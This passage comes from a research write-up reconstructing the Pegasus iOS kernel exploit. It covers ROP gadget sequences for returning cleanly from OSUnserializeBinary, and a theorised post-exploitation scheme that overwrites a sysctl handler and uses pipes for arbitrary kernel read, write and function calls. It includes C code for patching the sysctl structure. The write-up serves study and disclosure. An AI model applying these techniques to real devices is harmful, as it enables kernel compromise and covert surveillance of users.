This easiest way to handle this is after returning, is to use an error condition that causes the function to bail as quickly as possible.

After the unserialization switch, there is such a check:

//File: xnu-3248.30.4/libkern/c++/OSSerializeBinary.cpp
switch (kOSSerializeTypeMask & key)
{


    case kOSSerializeObject:
        if (len >= objsIdx) break;
        o = objsArray[len];
        o->retain();
        isRef = true;
        break;


}

if (!(ok = (o != 0))) break;

If o is NULL, the loop breaks, and the function quickly returns without further reference to the corrupt object.

Let’s look at the disassembly:

mov     [rbp+var_5C], edx
mov     eax, ebx
mov     rbx, [rdi+rax*8] ; o=objsArray[len];
						; rbx<-o
mov     rax, [rbx]
mov     rdi, rbx
call    qword ptr [rax+20h] ; UaF here: o->release()
...
jmp     loc_FFFFFF8000835

Then shortly thereafter, we see a check of rbx is NULL:

loc_FFFFFF8000835604:
test    rbx, rbx
setnz   r12b
mov     r13, [rbp+var_40]
mov     rdi, [rbp+var_80]
jz      loc_FFFFFF8000835B0D

So, somehow our gadget chain needs to ensure rbx gets zeroed out before returning to the caller. Here is a sequence of gadgets sequence of gadgets that does just that. Recall that each gadget jumps or returns back into the dispatcher. The dispatcher stages rdi and rsi before jumping to the next gadget.

Push the address of the chain’s intended kernel function. A future gadget will ret to it:

push    rsi <--contains address of desired kernel function (e.g., `copyout()`)
jmp     QWORD PTR [rcx] <--attacker-controlled address loaded by OSSerializer::serialize()

Push rbp to the stack to balance a future pop rbp:

push    rbp <--prepare for pop rbp
and     al,0xfd
jmp     QWORD PTR [rsi-0x7b]

Push NULL to the stack to be later popped into rbx:

push    rsi <--contains 0 for rbx
jmp     QWORD PTR [rcx]

Pop NULL into rbx, restore rbp, then return into the target function which, in turn, will return gracefully back to OSUnserializeBinary().

pop     rbx
pop     rbp
ret

Shortly after the return, rbx is found to be 0 and the function quickly bails.

Post-Exploitation: Gaining Reusable Read, Write, and Execute

Note: The following description of post-exploitation is mostly a suggested theory of operation and is not a fact-for-fact description of Pegasus’s actual behavior. It is based on a combination of abstract description in the Lookout paper and independent research for this project.

According to the Lookout paper, the goal for the kernel exploit was to patch the kernel in such a way that userspace could read from and write to arbitrary kernel memory, and could call arbitrary kernel functions (or other executable kernel code) without having re-exploit and risk destabilizing the system.

The paper isn’t particularly explicit with respect to how this mechanism works, other than to say on 32-bit systems, two different clock handlers are overwritten. It also goes on to say that a pipe set (see pipe(2) manpage) is used as a conduit with which to read and write kernel data, and to stage shellcode to be executed.

On 64-bit systems, Lookout is even more vague. It only says that the mechanism is simpler: a sysctl handler is overwritten, rather than the two clock handlers. It also suggests that the pipe is used in a “similar” way. It is left as an exercise for the reader to imagine how this mechanism works.

Pipes: A Way To Converse with the Kernel

It would be worthwhile for the reader spend time studying how pipes work in the kernel. Briefly, here are some salient points:

A pipe has a pair of file descriptors (one for each “end” of the pipe)
The file descriptors each have an inode
Since the pipe doesn’t really exist on the filesystem, the inode turns out to be the obfuscated address of one of the pipe’s data structures in kernel memory
A pipe struct in the kernel contains a nested structure that points to the read or write buffer for that file descriptor

Here’s relevant kernel code.

Pipe struct:

//File: xnu-3248.30.4/bsd/sys/pipe.h

/*
 * Per-pipe data structure.
 * Two of these are linked together to produce bi-directional pipes.
 */
struct pipe {
   struct  pipebuf pipe_buffer;    /* data storage */

};

A pipe’s backing storage:

//File: xnu-3248.30.4/bsd/sys/pipe.h
/*
 * Pipe buffer information.
 * Separate in, out, cnt are used to simplify calculations.
 * Buffered write is active when the buffer.cnt field is set.
 */
struct pipebuf {

   caddr_t buffer;     /* kva of buffer */
};

Statting a pipe file descriptor:

//File: xnu-3248.30.4/bsd/kern/sys_pipe.c
if (isstat64 != 0) {

    /*
    * Return a relatively unique inode number based on the current
    * address of this pipe's struct pipe.  This number may be recycled
    * relatively quickly.
    */
    sb64->st_ino = (ino64_t)VM_KERNEL_ADDRPERM((uintptr_t)cpipe);

What all this means is that, at least in theory, userspace can use the pipe’s pair of descriptors as a sort of dead-drop between itself and the compromised kernel. One descriptor is for sending data to the kernel; the other for retrieving data.

In theory, we could write a few things to the pipe:

Address of a function we want to have executed
Arguments to that function

Then, after triggering the kernel’s execution of the function or gadget (which we’ll get to next), we can read the result from the other end of the pipe.

The attacker, of course, needs to leak the permutation value used to obfuscate the pipe’s address, but as we saw above, the use-after-free makes that straightforward.

sysctl: A Generic Interface to Call Arbitrary Kernel Functions

The less straight forward part is how to patch the sysctl handler in such a way that it can be made to trigger execution of an arbitrary function with arbitrary arguments.

The Lookout paper says the net.inet.ip.dummynet.extract_heap “sysctl handler is overwritten,” but doesn’t elaborate farther. Presumably this is a rarely or never used sysctl OID on iOS. Let’s look at a sysctl structure:

//File: xnu-3248.30.4/bsd/sys/sysctl.h
struct sysctl_oid {
   struct sysctl_oid_list *oid_parent;
   SLIST_ENTRY(sysctl_oid) oid_link;
   int     oid_number;
   int     oid_kind;
   void        *oid_arg1;
   int     oid_arg2;
   const char  *oid_name;
   int         (*oid_handler) SYSCTL_HANDLER_ARGS;
   const char  *oid_fmt;
   const char  *oid_descr; /* offsetof() field / long description */
   int     oid_version;
   int     oid_refcnt;
};

Above, the oid_handler element is a pointer to the function that gets called when this sysctl is exercised. That function takes four arguments which are:

A pointer to the sysctl_oid struct, itself,
The oid_arg1 element
The oid_arg2 element
A pointer to the sysctl_req structure representing the sysctl request from userspace.

It’s unclear how the sysctl structure is modified. The Lookout paper simply says that the handler is overwritten and that OSSerializer::serialize() is used in a “similar way” to the 32-bit version of the exploit.

One option would be to simply overwrite the oid_handler pointer, but that doesn’t result in the attacker controlling arguments to that function. If the handler is to be replaced with OSSerializer::serialize(), then the first argument (rdi on x86-64) must point to a buffer of attacker-controlled data.

Another option is to overwrite the entire structure in kernel memory, replacing 8-byte values at the offsets parsed by OSSerializer::serialize() with attacker-controlled data. The exploit would have to first dump the sysctl structure from kernel memory, patch it, then copy it back in, requiring two separate triggers of the use-after-free bug. This can be made more stable by staging two contiguous payloads in a single pass using open_extended(); one to call copyout() and dump the structure, the other to call copyin() and replacing the sysctl with the patched structure.

Here is an example of patching the structure so that it may be parsed by OSSerializer::serialize():

void patch_sysctl(char *sysctlbuf, uint64_t rdi, uint64_t rsi, uint64_t rax,uint64_t new_handler)
{
	//OSSerializer:serialize() gets a pointer to this struct
	//in rdi. It doesn't parse it as a sysctl_oid struct, so we don't
	//need to either. It gets its new rdi from buf+0x10, rsi from buf+0x18,
	//and rax from buf+0x20 (to which it will jump)
	memcpy(sysctlbuf+0x20,&rax,sizeof(uint64_t));
	memcpy(sysctlbuf+0x18,&rsi,sizeof(uint64_t));
	memcpy(sysctlbuf+0x10,&rdi,sizeof(uint64_t));
	((struct almost_sysctl_oid *)sysctlbuf)->oid_handler=new_handler;
}

The exploit may then, after deobfuscating the kernel address of the pipe structure, patch the sysctl structure like so:

patch_sysctl((char *)sysctl,pipe_addr,__unused__,first_gadget,oss_serialize_addr);

This replaces the handler with a pointer to OSSerializer::serialize() which will then parse out the address of the pipe struct into rdi and the address of the first gadget into rax (plus an unused, second argument into rsi).

In the proof-of-concept, this strategy works. The only remaining unsolved piece is finding a gadget to dereference the pipe struct, placing pipe->pipebuf->buffer into rdi, then jump back into OSSerializer::serialize() a second time to pull arguments out of the attacker’s buffer, and call the attacker’s requested kernel function.

This would allow us to, from userspace:

Write the function address and arguments to the pipe
Call sysctl() for the net.inet.ip.dummynet.extract_heap OID, triggering execution of our function
Read the result from the other end of the pipe

Conclusion and Further Work

This writeup intended to aggregate much of the publicly available but scattered technical details of Pegasus’s kernel exploitation. It also aimed to fill in some gaps left by previous discussions.

Here are a few aspects from the Lookout paper and other write-ups that are hopefully are more clear:

The relationship between smaller and larger attacker-controlled buffers
The mechanics of abusing open_extended() to stage the larger payload
The process and purpose of page-aligning the second payload buffer prior to staging
The oracle leaked using OSNumber, and how it predicts the location of the second stage payload
What specifically the exploit should do during control of execution to facilitate post-exploitation
Gracefully continuing execution after exploitation

While the post-exploitation section proposed a credible theory around how to stably exercise arbitrary kernel code, it stops short of completely describing a generic mechanism. The exercise of implementing a framework to do this may be worthwhile for the reader. There are likely interesting challenges lying in wait even for this final piece.